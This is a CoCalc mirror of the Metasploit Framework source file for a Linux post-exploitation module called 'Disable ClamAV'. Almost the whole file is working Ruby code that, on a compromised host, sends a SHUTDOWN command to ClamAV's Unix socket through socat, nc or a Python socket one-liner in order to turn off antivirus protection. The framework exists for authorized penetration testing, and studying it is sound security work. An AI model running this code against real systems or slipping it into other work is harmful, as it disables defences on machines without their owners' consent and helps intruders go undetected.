Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/linux/manage/disable_clamav.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Unix
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Disable ClamAV',
15
'Description' => %q{
16
This module will write to the ClamAV Unix socket to shutoff ClamAV.
17
},
18
'License' => MSF_LICENSE,
19
'Author' => [
20
'DLL_Cool_J'
21
],
22
'Platform' => [ 'linux' ],
23
'SessionTypes' => [ 'meterpreter', 'shell' ],
24
'Notes' => {
25
'Stability' => [SERVICE_RESOURCE_LOSS],
26
'Reliability' => [],
27
'SideEffects' => [IOC_IN_LOGS]
28
}
29
)
30
)
31
register_options(
32
[
33
OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),
34
OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])
35
]
36
)
37
end
38
39
def run
40
clamav_socket = datastore['CLAMAV_UNIX_SOCKET']
41
cmd = datastore['COMMAND']
42
43
if command_exists?('socat')
44
print_good('socat exists')
45
payload = "echo #{cmd} | socat - UNIX-CONNECT:#{clamav_socket}"
46
elsif command_exists?('nc')
47
print_good('nc exists')
48
payload = "echo #{cmd} | nc -U #{clamav_socket}"
49
elsif command_exists?('python')
50
print_good('python exists')
51
payload = "python -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""
52
elsif command_exists?('python3')
53
print_good('python3 exists')
54
payload = "python3 -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""
55
else
56
fail_with(Failure::NotFound, 'No suitable binary found on the target host. Quitting!')
57
end
58
59
print_status("Checking file path #{clamav_socket} exists and is writable... ")
60
print_bad('File does NOT exist or is not writable!') unless writable?(clamav_socket.to_s)
61
print_good('File does exist and is writable!')
62
print_good("Sending #{cmd}...")
63
cmd_exec(payload)
64
end
65
end
66
67